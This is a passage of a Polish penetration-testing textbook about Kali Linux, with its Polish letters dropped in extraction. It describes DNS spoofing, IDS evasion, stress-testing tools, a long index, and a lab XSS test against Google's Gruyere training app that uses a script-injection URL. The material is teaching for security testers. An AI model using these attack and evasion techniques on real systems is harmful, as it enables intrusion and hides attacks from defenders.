Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 25: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego 